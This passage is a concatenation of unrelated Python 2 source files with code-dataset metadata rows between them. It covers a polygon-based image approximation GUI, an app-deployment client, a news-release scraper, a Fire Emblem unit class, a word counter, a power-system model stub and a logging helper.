fit = 1. - sum(stat.rms[:3])/(255*3)
if self.fitness_offset == 0:
black_image = aggdraw.Draw("RGBA", im1.size, background)
s = black_image.tostring()
raw = Image.fromstring('RGBA', im1.size, s)
stat = ImageStat.Stat(ImageChops.difference(im1, raw))
self.fitness_offset = 1. - sum(stat.rms[:3])/(255*3)
return 100*(fit-self.fitness_offset)/(1.-self.fitness_offset)
def fitness(im1, im2, background="black"):
"""Calculate a value derived from the root mean squared of the difference
between two images. It is normalized so that when a black image is
compared with the original one (img1), the fitness given is 0, and when the
image is identical, the fitness value is 100."""
global FITNESS_OFFSET
try:
stat = ImageStat.Stat(ImageChops.difference(im1, im2))
except:
print "missing alpha channel in original image?"
im1.putalpha(255)
stat = ImageStat.Stat(ImageChops.difference(im1, im2))
fit = 1. - sum(stat.rms[:3])/(255*3)
if FITNESS_OFFSET == 0:
black_image = aggdraw.Draw("RGBA", im1.size, background)
s = black_image.tostring()
raw = Image.fromstring('RGBA', im1.size, s)
stat = ImageStat.Stat(ImageChops.difference(im1, raw))
FITNESS_OFFSET = 1. - sum(stat.rms[:3])/(255*3)
return 100*(fit-FITNESS_OFFSET)/(1.-FITNESS_OFFSET)
class DNA(object):
def __init__(self, width, height, polygons=50, edges=6, background=(0, 0, 0)):
self.polygons = polygons
self.background = background
self.edges = edges
self.width = width
self.height = height
self.genes = []
self.init_dna()
def init_dna(self):
for i in range(self.polygons):
self.genes.append(self.create_random_polygon())
def create_random_polygon(self):
edges = []
for i in range(self.edges):
edges.append(randint(0, self.width))
edges.append(randint(0, self.height))
col = [randint(0, 255), randint(0, 255), randint(0, 255), randint(0, 255)]
return [edges, col]
def mutate(self):
selected = randint(0, self.polygons-1)
_type = randint(0, 2)
if _type == 0: # colour
col_index = randint(0, 3)
self.genes[selected][1][col_index] = randint(0, 255)
elif _type == 1: # x coordinate
coord = randint(0, self.edges-1)
self.genes[selected][0][2*coord] = randint(0, self.width)
elif _type == 2: # y coordinate
coord = randint(0, self.edges-1)
self.genes[selected][0][2*coord+1] = randint(0, self.height)
def small_mutate(self, max_change):
'''makes a small mutation - guaranteed to be different from current
state but within acceptable range of values'''
selected = randint(0, self.polygons-1)
_type = randint(0, 2)
delta = 0
while delta == 0:
delta = 5 - randint(0, max_change)
if _type == 0: # colour
col_index = randint(0, 3)
current = self.genes[selected][1][col_index]
self.genes[selected][1][col_index] += delta
if self.genes[selected][1][col_index] < 0:
if current != 0:
self.genes[selected][1][col_index] = 0
else:
self.genes[selected][1][col_index] = 1
elif self.genes[selected][1][col_index] > 255:
if current != 255:
self.genes[selected][1][col_index] = 255
else:
self.genes[selected][1][col_index] = 254
elif _type == 1: # x coordinate
coord = randint(0, self.edges-1)
current = self.genes[selected][0][2*coord]
self.genes[selected][0][2*coord] += delta
if self.genes[selected][0][2*coord] < 0:
if current != 0:
self.genes[selected][0][2*coord] = 0
else:
self.genes[selected][0][2*coord] = 1
elif self.genes[selected][0][2*coord] > self.width:
if current != self.width:
self.genes[selected][0][2*coord] = self.width
else:
self.genes[selected][0][2*coord] = self.width -1
elif _type == 2: # y coordinate
coord = randint(0, self.edges-1)
current = self.genes[selected][0][2*coord+1]
self.genes[selected][0][2*coord+1] += delta
if self.genes[selected][0][2*coord+1] < 0:
if current != 0:
self.genes[selected][0][2*coord+1] = 0
else:
self.genes[selected][0][2*coord+1] = 1
elif self.genes[selected][0][2*coord+1] > self.height:
if current != self.height:
self.genes[selected][0][2*coord+1] = self.height
else:
self.genes[selected][0][2*coord+1] = self.height-1
class AggDrawCanvas(tk.Canvas):
def __init__(self, parent, original):
tk.Canvas.__init__(self, parent)
self.parent = parent
self.image_id = None
self.img = None
self.display_every = 1
self.background = "#000000"
# the following are used to calculate the average nb of mutation/second
self.keep_last_n = 20
self.gen_times = [1. for i in range(self.keep_last_n)]
self.last_time = time.time()
def new_original(self, original):
self.original = original
self.mutations = 0
_img = ImageTk.PhotoImage(self.original)
self.set_size(_img.width(), _img.height())
self.img = Image.new("RGBA", self.size_, self.background)
self.dna = DNA(self.width_, self.height_, background=self.background)
self.context = aggdraw.Draw(self.img)
def set_size(self, width, height):
self.width_ = width
self.height_ = height
self.size_ = width, height
self.config(width=width, height=height)
def draw_dna(self):
brush = aggdraw.Brush(self.background, opacity=255)
self.context.rectangle((0, 0, self.width_, self.height_), brush)
for gene in self.dna.genes:
brush = aggdraw.Brush(tuple(gene[1][0:3]), opacity=gene[1][3])
self.context.polygon(gene[0], brush)
self.redraw()
def redraw(self):
self.mutations += 1
self.calc_average_time()
s = self.context.tostring()
raw = Image.fromstring('RGBA', self.size_, s)
self.fitness = fitness(self.original, raw, self.background)
if self.mutations % self.display_every:
return
self.parent.update_info()
self.image = ImageTk.PhotoImage(raw)
self.delete(self.image_id)
self.image_id = self.create_image(self.width_/2, self.height_/2, image=self.image)
self.update()
def calc_average_time(self):
'''calculates the average time for a given mutation - based on the
previous "fastest n-1" and converts it to a number of mutation
per second.'''
now = time.time()
self.gen_times[self.mutations%self.keep_last_n] = now - self.last_time
self.last_time = now
# discard the longest time iteration to avoid skewing results
self.ave_gen_per_second = self.keep_last_n/sum(sorted(self.gen_times)[:-1])
def prevent_accidental_closure():
"""prevents accidental closure of "child" window"""
tkMessageBox.showinfo("Quit?",
"Use the main window (where images are loaded) to end this program.")
class FitWindow(tk.Toplevel):
def __init__(self, parent, original_image, title):
tk.Toplevel.__init__(self)
self.title(title)
self.parent = parent
main_frame = tk.Frame(self)
# image frame
self.image_frame = tk.Frame(main_frame)
self.image_frame.update_info = self.update_info
self.fit = AggDrawCanvas(self.image_frame, original_image)
self.fit.pack()
self.protocol("WM_DELETE_WINDOW", prevent_accidental_closure)
info_frame = tk.Frame(self.image_frame)
info_frame.pack()
self.info = tk.Label(info_frame, text="Current fitness")
self.info.pack()
self.show_every_btn = tk.Button(info_frame, width=25, height=1,
text="Display every %d image." % self.fit.display_every,
command=self.set_show_every)
self.show_every_btn.pack()
self.image_frame.pack(side=tk.RIGHT)
self.setup_controls(main_frame)
main_frame.pack()
def setup_controls(self, main_frame):
pass # implemented by subclass
def update_info(self):
if self.fit.ave_gen_per_second > 2:
self.info.config(text = "Fitness: %2.2f\nMutations: %d\n[per second: %d]" %
(self.fit.fitness, self.fit.mutations,
int(self.fit.ave_gen_per_second)))
else:
self.info.config(text = "Fitness: %2.2f\nMutations: %d\n[per second: %1.2f]" %
(self.fit.fitness, self.fit.mutations,
self.fit.ave_gen_per_second))
def set_show_every(self):
set_frequency_dialog = dialogs.ImageFrequency(self)
if set_frequency_dialog.result is not None:
self.fit.display_every = set_frequency_dialog.result
self.show_every_btn.config(text =
"Display every %d image.\n" % self.fit.display_every)
class BestFitWindow(FitWindow):
def setup_controls(self, main_frame):
#self.control_frame = tk.Frame(main_frame)
set_color_btn = tk.Button(main_frame, width=25,
text="Select background color",
command=self.parent.set_background_color)
set_color_btn.pack()
small_frame = tk.Frame(main_frame)
self.color_value = tk.Label(small_frame)
self.color_value.configure(text=self.fit.background, width=10)
self.color_value.pack(side=tk.LEFT)
self.color_sample = tk.Label(small_frame)
self.color_sample.configure(width=14)
self.color_sample.pack(side=tk.LEFT)
small_frame.pack()
self.color_sample.configure(background=self.fit.background)
save_polygons_btn = tk.Button(main_frame, width=25,
text="Save polygons",
command=self.save_poly)
save_polygons_btn.pack()
load_polygons_btn = tk.Button(main_frame, width=25,
text="Load polygons",
command=self.load_poly)
load_polygons_btn.pack()
self.set_nb_polygons_btn = tk.Button(main_frame, width=25, height=1,
text="Use N polygons.", command=self.set_nb_polygons)
self.set_nb_polygons_btn.pack()
self.set_nb_sides_btn = tk.Button(main_frame, width=25, height=1,
text="Number of sides per polygon.", command=self.set_nb_sides)
self.set_nb_sides_btn.pack()
self.save_image_btn = tk.Button(main_frame, width=25, height=1,
text="Save image.", command=self.save_image)
self.save_image_btn.pack()
#self.control_frame.pack(side=tk.LEFT)
def save_image(self):
dialogs.SaveImage()
def set_nb_polygons(self):
polygons_dialog = dialogs.NumberOfPolygons(self)
#if set_frequency_dialog.result is not None:
# self.fit.display_every = set_frequency_dialog.result
# self.show_every_btn.config(text =
# "Display every %d image.\n" % self.fit.display_every)
def set_nb_sides(self):
sides_dialog = dialogs.NumberOfSides(self)
#if sides_dialog.result is not None:
# self.fit.display_every = set_frequency_dialog.result
# self.show_every_btn.config(text =
# "Display every %d image.\n" % self.fit.display_every)
def save_poly(self):
filename = tkFileDialog.asksaveasfilename()
if not filename:
return
filehandle = open(filename, "w")
print "save_poly called"
dna = []
dna.append(self.fit.background)
dna.append(str(self.fit.dna.polygons))
dna.append(str(self.fit.dna.edges))
coords = range(2*self.fit.dna.edges)
for gene in self.fit.dna.genes:
for item in gene:
for value in item:
dna.append(str(value))
filehandle.write(' '.join(dna))
def load_poly(self):
filename = tkFileDialog.askopenfilename()
if not filename:
return
items = open(filename).read().split()
self.fit.background = items[0]
self.fit.dna.polygons = int(items[1])
self.fit.dna.edges = int(items[2])
nb_coords = 2*self.fit.dna.edges
nb_subitems = nb_coords + 4 # 4 color values per polygon
offset = 3 # first 3 values are excluded
self.fit.dna.genes = []
for i in range(self.fit.dna.polygons):
coords = []
color = []
for j in range(nb_coords):
coords.append(int(items[offset+i*nb_subitems + j]))
for j in range(4):
color.append(int(items[offset+i*nb_subitems + nb_coords + j]))
self.fit.dna.genes.append([coords, color])
self.fit.current_fit.background = self.fit.background
self.fit.current_fit.dna.polygons = self.fit.dna.polygons
self.fit.current_fit.dna.edges = self.fit.dna.edges
self.fit.current_fit.dna = copy.deepcopy(self.fit.dna)
class App(object):
"""The main application window"""
def __init__(self, parent):
parent.controls = self
# Main window
filename_button = tk.Button(parent, text="New image",
command=self.load_image)
filename_button.pack(side=tk.TOP)
self.original_image = tk.Canvas(parent)
self.original_image.pack(side=tk.TOP)
self.original = None
self.best_fit_window = BestFitWindow(self, self.original, "Best fit")
self.best_fit = self.best_fit_window.fit
cur_fit_window = FitWindow(self, self.original, "Current attempt")
self.current_fit = cur_fit_window.fit
self.best_fit.current_fit = self.current_fit
def load_image(self):
filename = tkFileDialog.askopenfilename()
if not filename:
return
try:
self.original = Image.open(filename)
except IOError:
print "ignored IOError; most likely not a valid image file."
return
img = ImageTk.PhotoImage(self.original)
width, height = img.width(), img.height()
self.original_image.config(width=width, height=height)
self.original_image.create_image(width/2, height/2, image=img)
self.__img = img # need to keep a reference otherwise it disappears!
self.best_fit.new_original(self.original)
self.best_fit.draw_dna()
self.current_fit.new_original(self.original)
self.current_fit.dna = copy.deepcopy(self.best_fit.dna)
self.current_fit.draw_dna()
def set_background_color(self):
scc = SimpleColorChooser(self.best_fit_window)
color = scc.choose_color()
self.best_fit.background = color
self.current_fit.background = color
self.best_fit_window.color_value.configure(text=color)
self.best_fit_window.color_sample.configure(background=color)
def reset(self):
'''restarts the image fitting with a new set of polygons'''
self.running = False
if tkMessageBox.askokcancel("",
"New starting set of polygons?\nNote: you will lose all changes done so far."):
self.best_fit.dna.init_dna()
self.best_fit.mutations = 0
self.best_fit.draw_dna()
self.current_fit.dna.genes = copy.deepcopy(self.best_fit.dna.genes)
self.current_fit.mutations = 0
self.current_fit.draw_dna()
def run(self):
'''starts or resume/restarts the "fitting".'''
self.running = True
while self.running:
done = self.step()
return done
def step(self):
'''single mutation step; currently never ends on its own'''
if self.best_fit.fitness < 82.:
self.current_fit.dna.mutate()
elif self.best_fit.fitness < 87.:
self.current_fit.dna.small_mutate(64)
elif self.best_fit.fitness < 91.:
self.current_fit.dna.small_mutate(32)
elif self.best_fit.fitness < 95.:
self.current_fit.dna.small_mutate(16)
else:
self.current_fit.dna.small_mutate(8)
self.current_fit.draw_dna()
if self.current_fit.fitness > self.best_fit.fitness:
self.best_fit.dna.genes = copy.deepcopy(self.current_fit.dna.genes)
self.best_fit.draw_dna()
else:
self.current_fit.dna.genes = copy.deepcopy(self.best_fit.dna.genes)
return False # would return True to end the simulation
def pause(self):
'''self explanatory'''
self.running = False
if __name__ == "__main__":
main_app = tk.Tk()
main_app.title('Image approximation with polygons')
main_window = App(main_app)
StateEngine(main_app, main_window.best_fit_window)
main_app.mainloop()
|
UTF-8
|
Python
| false | false | 2,011 |
13,761,075,226,532 |
1f77531ac483d29f7f615ba0b46431d42638ca4c
|
ce1f9921ff2b07a653321fc48a72b5b29f34f40f
|
/nbe/actions.py
|
bc2a109572134fdce276bbdce9a49ffc6db25d03
|
[] |
no_license
|
tonicbupt/nbe-deploy
|
https://github.com/tonicbupt/nbe-deploy
|
01e354fddfac6ead05ea36093fced0ec4a7130ca
|
3c1940bf5536877410d38aeca072b116d1ad62df
|
refs/heads/master
| 2021-01-19T14:06:28.501404 | 2014-11-18T09:35:31 | 2014-11-18T09:35:31 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# coding: utf-8
import click
import json
import requests
import yaml
from urlparse import urljoin
from .utils import nbeerror, nbeinfo
from .config import config
def yaml_to_json(filename):
try:
with open(filename, 'r') as f:
return json.dumps(yaml.load(f))
except IOError:
click.echo(nbeerror('file %s not exist.' % filename))
return ''
def yaml_load(filename):
try:
with open(filename, 'r') as f:
return yaml.load(f)
except IOError:
click.echo(nbeerror('file %s not exist.' % filename))
return {}
def register_app(name, version, group):
app_yaml = yaml_to_json('app.yaml')
if not app_yaml:
return
data = {
'appyaml': app_yaml,
'group': group,
}
url = urljoin(config.nbe_master_url,
'/app/{name}/{version}'.format(name=name, version=version))
r = requests.post(url, data=data)
click.echo(nbeinfo('request sent to %s' % url))
click.echo(nbeinfo(str(r.json())))
return r.status_code == 200
def add_app(name, version, host, daemon):
app_yaml = yaml_load('app.yaml')
if not app_yaml:
return
data = {
'host': host,
'daemon': daemon,
}
url = urljoin(config.nbe_master_url,
'app/{name}/{version}/add'.format(name=app_yaml['appname'], version=version))
r = requests.post(url, data)
click.echo(nbeinfo('request sent to %s' % url))
click.echo(nbeinfo(str(r.json())))
return r.status_code == 200
def list_app(name, version='latest'):
r = requests.get(urljoin(config.nbe_master_url,
'app/{name}/{version}'.format(name=name, version=version)))
if r.status_code == 200:
rs = json.loads(r.content)
if not rs['r']:
click.echo(nbeinfo(rs['name']))
click.echo(nbeinfo(rs['version']))
else:
click.echo(nbeerror(rs['msg']))
else:
click.echo(nbeerror('Error: %s' % r.status_code))
def remove_app(name, version, host):
app_yaml = yaml_load('app.yaml')
if not app_yaml:
return
data = {
'host': host
}
url = urljoin(config.nbe_master_url,
'app/{name}/{version}/remove'.format(name=app_yaml['appname'], version=version))
r = requests.post(url, data)
click.echo(nbeinfo('request sent to %s' % url))
click.echo(nbeinfo(str(r.json())))
return r.status_code == 200
def test_app(name, version, host):
app_yaml = yaml_load('app.yaml')
if not app_yaml:
return
data = {
'host': host
}
url = urljoin(config.nbe_master_url,
'app/{name}/{version}/test'.format(name=app_yaml['appname'], version=version))
r = requests.post(url, data)
click.echo(nbeinfo('request sent to %s' % url))
click.echo(nbeinfo(str(r.json())))
return r.status_code == 200
def build_image(name, version, group, base, host):
app_yaml = yaml_load('app.yaml')
if not app_yaml:
return
data = {
'host': host,
'group': group,
'base': base,
}
url = urljoin(config.nbe_master_url,
'app/{name}/{version}/build'.format(name=app_yaml['appname'], version=version))
r = requests.post(url, data)
click.echo(nbeinfo('request sent to %s' % url))
click.echo(nbeinfo(str(r.json())))
return r.status_code == 200
def deploy_app(name, version, host, daemon):
app_yaml = yaml_load('app.yaml')
if not app_yaml:
return
data = {
'hosts': host,
'daemon': daemon,
}
url = urljoin(config.nbe_master_url,
'app/{name}/{version}/deploy'.format(name=app_yaml['appname'], version=version))
r = requests.post(url, data)
click.echo(nbeinfo('request sent to %s' % url))
click.echo(nbeinfo(str(r.json())))
return r.status_code == 200
def update_app(name, old_version, new_version, host):
app_yaml = yaml_load('app.yaml')
if not app_yaml:
return
data = {
'hosts': host,
'to': new_version,
}
url = urljoin(config.nbe_master_url,
'app/{name}/{old_version}/update'.format(name=app_yaml['appname'], old_version=old_version))
r = requests.post(url, data)
click.echo(nbeinfo('request sent to %s' % url))
click.echo(nbeinfo(str(r.json())))
return r.status_code == 200
|
UTF-8
|
Python
| false | false | 2,014 |
17,033,840,335,739 |
00eda397be2c29fb885e0a6ebf75aa8dc7956446
|
3d19e1a316de4d6d96471c64332fff7acfaf1308
|
/Users/P/peterneish/victorian_nationals_media_releases.py
|
c7db97f8ef9444751ec195359536b8e4a82e0772
|
[] |
no_license
|
BerilBBJ/scraperwiki-scraper-vault
|
https://github.com/BerilBBJ/scraperwiki-scraper-vault
|
4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc
|
65ea6a943cc348a9caf3782b900b36446f7e137d
|
refs/heads/master
| 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Parses victorian Nationals media releases
import scraperwiki
from bs4 import BeautifulSoup
import feedparser
import re
import dateutil.parser
url = "http://vic.nationals.org.au/DesktopModules/DnnForge%20-%20NewsArticles/Rss.aspx?TabID=131&ModuleID=450&MaxCount=100"
print url
feed = feedparser.parse(url)
entries = []
entries.extend(feed["items"])
for entry in entries:
print entry["guid"]
print entry["title"]
print entry["link"]
print entry["author"]
print entry["updated"]
print entry["description"]
# now fetch the page and get the text
page = scraperwiki.scrape(entry["link"])
pagesoup = BeautifulSoup(page)
page_content = pagesoup.find("div", { "class" : "article" })
del(page_content["class"])
published = dateutil.parser.parse(entry["updated"]);
print page_content
#new_page_text = unicode.join(u'\n',map(unicode,new_page_content))
record = {"link" : entry["link"],
"title" : entry["title"],
"author" : entry["author"],
"published" : published,
"description" : entry["description"],
"fulltext" : page_content}
scraperwiki.sqlite.save(unique_keys=["link"], data=record)
# Parses victorian Nationals media releases
import scraperwiki
from bs4 import BeautifulSoup
import feedparser
import re
import dateutil.parser
url = "http://vic.nationals.org.au/DesktopModules/DnnForge%20-%20NewsArticles/Rss.aspx?TabID=131&ModuleID=450&MaxCount=100"
print url
feed = feedparser.parse(url)
entries = []
entries.extend(feed["items"])
for entry in entries:
print entry["guid"]
print entry["title"]
print entry["link"]
print entry["author"]
print entry["updated"]
print entry["description"]
# now fetch the page and get the text
page = scraperwiki.scrape(entry["link"])
pagesoup = BeautifulSoup(page)
page_content = pagesoup.find("div", { "class" : "article" })
del(page_content["class"])
published = dateutil.parser.parse(entry["updated"]);
print page_content
#new_page_text = unicode.join(u'\n',map(unicode,new_page_content))
record = {"link" : entry["link"],
"title" : entry["title"],
"author" : entry["author"],
"published" : published,
"description" : entry["description"],
"fulltext" : page_content}
scraperwiki.sqlite.save(unique_keys=["link"], data=record)
|
UTF-8
|
Python
| false | false | 2,013 |
18,150,531,799,087 |
6ee774bd1e7a2cfeca0525c9461c5aecceb0ff63
|
f439369c0dbbd3e9df037c63cc2d31a682e31dbe
|
/unit.py
|
85e97fe31f6a565f1652fb53841bba9bc6de5bd1
|
[] |
no_license
|
emahon/FireEmblemAI
|
https://github.com/emahon/FireEmblemAI
|
2ea9ebee4bf9a53cbe31abdbae7499279172c74d
|
8d54a1412fbaf1ea3472c29a263dc09fadf4119d
|
refs/heads/master
| 2021-01-02T09:08:57.514937 | 2013-05-10T03:20:42 | 2013-05-10T03:20:42 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#Represents a single unit
#Jazmin Gonzalez-Rivero, Zachary Homans, Elizabeth Mahon, Brendan Ritter
#Artificial Intelligence, Olin College, Spring 13
from feworld import *
import random
#A Unit is the basic moveable piece in Fire Emblem.
#They have a number of stats, an owner, and a name.
#They occupy a space. The death of a unit means defeat.
class unit:
#Units have the following:
# - Their World
# - Their Current Space
# - Their Major Stats
# - Their Class
# - Their Name
# - Their Owner
def __init__(self, world, space = None, hp = 20, attack = 10, defense = 0, move = 5, accuracy = .9, unitType = 'infantry', name = "", owner = None):
self.space = space
self.hp = hp
self.attack = attack
self.defense = defense
self.move = move
self.unitType = unitType
self.name = name
space.add_unit(self)
self.player = owner
self.accuracy = accuracy
def __str__(self):
return self.name
def __repr__(self):
return self.name
def get_space(self):
#Returns unit's space.
return self.space
def get_x(self):
#Returns x location.
return self.space.get_x()
def get_y(self):
#Returns y location.
return self.space.get_y()
def move_unit(self, space):
#Moves a unit to a new space, if possible.
self.move_list = self.get_move_list()
if space in self.move_list:
space.add_unit(self)
self.space = space
self.move_list = self.get_move_list()
print str(self.name) + " moved to " + str(space)
return 0
else:
print self.name+" can't move to "+ str(space)
return 1
def attack_enemy(self, enemy):
#Initiates an attack sequence.
#If the attack hits, do the appropriate damage. Else, nothing happens.
if random.random() < (self.accuracy-enemy.space.terrain.evasionMod):
damage = (self.attack - (enemy.defense + enemy.space.defense()))
enemy.hp = enemy.hp - damage
print self.name+" hit "+enemy.name+" for "+str(damage)+" damage."
else:
print self.name + " missed " + enemy.name
#Checks to see if the enemy is dead. If not, counterattack.
if enemy.hp > 0:
#After an attack comes a counterattack. It's the exact reverse of an attack.
if random.random() < (enemy.accuracy-self.space.terrain.evasionMod):
damage = (enemy.attack - (self.defense + self.space.defense()))
self.hp = self.hp - damage
print enemy.name+" hit "+self.name+" for "+str(damage)+" damage."
else:
print enemy.name + " missed " + self.name
if self.hp <= 0:
self.die()
else:
enemy.die()
def die(self):
#The unit dies.
self.space.unit = None
self.space = None
self.player.units.remove(self)
print self.name + " has died."
def get_move_list(self):
#Returns the list of possible movements of a unit.
#Does a basic breadth-first search.
#Considers movement modifers, terrain, and other units.
start_space = self.get_space()
world = start_space.world
moves_remaining = self.move
move_list = [start_space]
recent_moves = [(start_space,moves_remaining)]
next_moves = []
while recent_moves != []:
considered_space = recent_moves.pop(0)
for move_poss in ([0, 1], [0, -1], [1, 0], [-1, 0]):
place = world.get_space(considered_space[0].get_x()+move_poss[0], considered_space[0].get_y()+move_poss[1])
if place != None:
new_move = considered_space[1] - place.terrain.moveMod
#Units can "walk over" friendly units
#So don't make them a block
if place.unit in self.player.units or place.unit==None:
if place not in move_list:
if new_move >= 0:
move_list.append(place)
if new_move > 0:
recent_moves.append((place,new_move))
#Units cannot stand on the same spot as another unit
#So remove any spaces that have units on them.
for loc in move_list:
if loc.unit != None and loc.unit != self:
move_list.remove(loc)
return move_list
def get_attack_list(self):
#Expands one more space out from the movement list
#to determine the possible spaces a unit can attack.
world = self.space.world
move_list = self.get_move_list()
attack_list = []
for space in move_list:
in_range = []
for move_poss in ([0, 1], [0, -1], [1, 0], [-1, 0]):
in_range.append(world.get_space(space.get_x()+move_poss[0], space.get_y()+move_poss[1]))
for space_in_range in in_range:
if space_in_range != None and space_in_range not in attack_list:
attack_list.append(space_in_range)
return attack_list
|
UTF-8
|
Python
| false | false | 2,013 |
3,161,095,946,459 |
db3e902cea0ff801fc061452344173316232fa21
|
d6ed3b1a0d53fee2cfac45ee82735749819da28f
|
/ga/exercise/word_count.py
|
4c1da2c095357cc9abd154d3a22ff2df4e18006d
|
[] |
no_license
|
whitney/misc
|
https://github.com/whitney/misc
|
776ab87e3a95c566e91b04f0a3e284afa6ebd655
|
971bdd3886cb5d2146630ec35fda072f7d33afbc
|
refs/heads/master
| 2016-09-11T13:40:24.989515 | 2012-11-06T22:49:01 | 2012-11-06T22:49:01 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python
import sys
import re
def main(search_word, text_file):
try:
f = open(text_file)
except IOError as e:
print "I/O error({0}): {1}".format(e.errno, e.strerror)
sys.exit(1)
count = 0
distances = []
curr_dist = 0
found = False
line_rgx = re.compile('\W+')
word_rgx = re.compile(search_word, flags=re.IGNORECASE)
for line in f:
words = line_rgx.split(line)
for word in words:
if not word: continue
if word_rgx.match(word):
if found:
distances.append(curr_dist)
else:
found = True
count += 1
curr_dist = 0
else:
curr_dist += 1
avg_dist = float(sum(distances))/len(distances) if len(distances) > 0 else float('nan')
print "Token occurences: {0}".format(count)
print "Avg distance: {0}".format(avg_dist)
if __name__ == "__main__":
if len(sys.argv) != 3:
usg = "usage: word_count.py <word> <path_to_file>\n"
usg += "ex. ./word_count.py peace WarAndPeace.txt"
print usg
sys.exit(1)
word = sys.argv[1]
text_file = sys.argv[2]
main(word, text_file)
|
UTF-8
|
Python
| false | false | 2,012 |
2,430,951,502,863 |
b31ff788e632971514cc22198d52b9c145a5012a
|
9b85c93e9ee2ac36657b83fc3c4ec4b70a3dbb1c
|
/cpsm/operational_limits/operational_limit_set.py
|
27ff2d106026671d7e06de594b7567d929abefb7
|
[
"AGPL-3.0-only",
"AGPL-3.0-or-later"
] |
non_permissive
|
ResearchEngr/openpowersystem
|
https://github.com/ResearchEngr/openpowersystem
|
54643b4e076615761735b431e688cb3da662d9c0
|
f2367104277d6d1b05cf127231abdab925481876
|
refs/heads/master
| 2021-01-14T09:54:27.623200 | 2010-06-22T14:20:44 | 2010-06-22T14:20:44 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#------------------------------------------------------------------------------
# Copyright (C) 2009 Richard Lincoln
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation; version 2 dated June, 1991.
#
# This software is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANDABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#------------------------------------------------------------------------------
""" A set of limits associated with equipmnet.
"""
# <<< imports
# @generated
from cpsm.core.identified_object import IdentifiedObject
from cpsm.core.equipment import Equipment
from google.appengine.ext import db
# >>> imports
class OperationalLimitSet(IdentifiedObject):
""" A set of limits associated with equipmnet.
"""
# <<< operational_limit_set.attributes
# @generated
# >>> operational_limit_set.attributes
# <<< operational_limit_set.references
# @generated
# The equpment to which the limit set applies.
equipment = db.ReferenceProperty(Equipment,
collection_name="operational_limit_set")
# Virtual property. Values of equipment limits.
pass # operational_limit_value
# >>> operational_limit_set.references
# <<< operational_limit_set.operations
# @generated
# >>> operational_limit_set.operations
# EOF -------------------------------------------------------------------------
|
UTF-8
|
Python
| false | false | 2,010 |
438,086,706,651 |
6939c0afbef5e2a06b6de8dc01e010099cf18969
|
98a3167fb54d3eab8974ad9dd04929fd45b435c3
|
/pyutils/log.py
|
ca0c95e1766deb74451077d33ee2a4a1392d433c
|
[] |
no_license
|
gmerritt/python_networktools
|
https://github.com/gmerritt/python_networktools
|
eb5da07eddff1fd89fdc37cc95190490b92c6d37
|
3a747426e03f6b62eb619a1fa57a3b30254f7202
|
refs/heads/master
| 2021-01-15T17:59:18.747387 | 2014-08-14T22:03:42 | 2014-08-14T22:03:42 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
######################################################################################
# Python's logging libraries are overly complicated for daily use.
#
# This library simplifies things by assuming that your application:
#
# * Wants to write all log messages to a single log file or to stdout.
# * Only wants to toggle between INFO and DEBUG level logging.
#
# Sample usage:
#
# import pyUtils.log
# import signal
# pyUtils.log.setup_logging( "/var/log/myapp.log" )
# # reopen logfile if we catch a sighup (e.g. from logrotate)
# signal.signal( signal.SIGHUP, pyUtils.log.reopen_logfile )
# logging.info( "myapp started" )
#
######################################################################################
import logging
import time
import sys
import os
__log_setup_complete = False
__logfile_handler = None
__logfile_name = None
__log_format = "%(asctime)s %(levelname)-5s [%(process)d/%(threadName)-10s]: %(message)s"
__sigusr_handler = None
class log_prepend(logging.Filter):
"""
This is a log filter which prepends contextual information into the log.
Original use case is for MAC Addresses so greping is easier.
To change value use:
logging.log(99, 'value')
To reset value use:
logging.log(99, None)
"""
def __init__(self, default='00-00-00', length=8, loglevel=99):
self.default_value = default
self.log_level = loglevel
self.length = -length
self.log_prepend_value = default
def filter(self, record):
if record.levelno == self.log_level:
if record.msg == None:
self.log_prepend_value = self.default_value
else:
self.log_prepend_value = record.msg[self.length:]
return False
try:
new_msg = self.log_prepend_value + " | " + record.msg.__str__()
except:
new_msg = self.log_prepend_value + " | " + record.msg.__repr__()
new_msg = new_msg.replace("\n", "\n" + self.log_prepend_value + " | ")
record.msg = new_msg
return True
class sigusr_log_handler(logging.Handler):
def __init__(self, level=logging.NOTSET):
self.sigusr_timeout = 0
logging.Handler.__init__(self, level)
def handle(self, record):
'''This function is called every time a log record is encountered'''
if ( (self.sigusr_timeout != 0) and (self.sigusr_timeout <= time.time()) ):
self.sigusr_timeout = 0
logging.debug( "Stopping DEBUG Logging - SIGUSR1 Expired" )
loglevel = logging.INFO
rootLogger = logging.getLogger( '' )
rootLogger.setLevel( loglevel )
rootLogger.removeHandler( self )
def setup_logging( logfile=None, verbose=False, debug=False, enable_sigusr=False, prepend_mac=False ):
'''Initialize the python logging classes with some reasonable defaults.
logfile: the file where log messages will be written
verbose: if true, log messages will also be sent to stdout
debug: if true, log at priority DEBUG (default is INFO).
After calling this function your application can write log messages via:
logging.<loglevel>( "foo" )
assuming you've done "import logging" somewhere along the way.
'''
global __logfile_handler, __logfile_name, __log_setup_complete
loglevel = logging.INFO
if debug:
loglevel = logging.DEBUG
rootLogger = logging.getLogger('')
rootLogger.setLevel( loglevel )
if logfile:
__logfile_name = logfile
__logfile_handler = logging.FileHandler( logfile )
__logfile_handler.setFormatter( logging.Formatter(__log_format) )
rootLogger.addHandler( __logfile_handler )
if verbose:
# also log to stdout
console = logging.StreamHandler( sys.stdout )
console.setFormatter( logging.Formatter(__log_format))
logging.getLogger('').addHandler( console )
if prepend_mac:
rootLogger.addFilter(log_prepend( default='00-00-00', length=8, loglevel=99 ))
else:
logging.basicConfig(level=loglevel, format=__log_format)
if enable_sigusr:
import signal
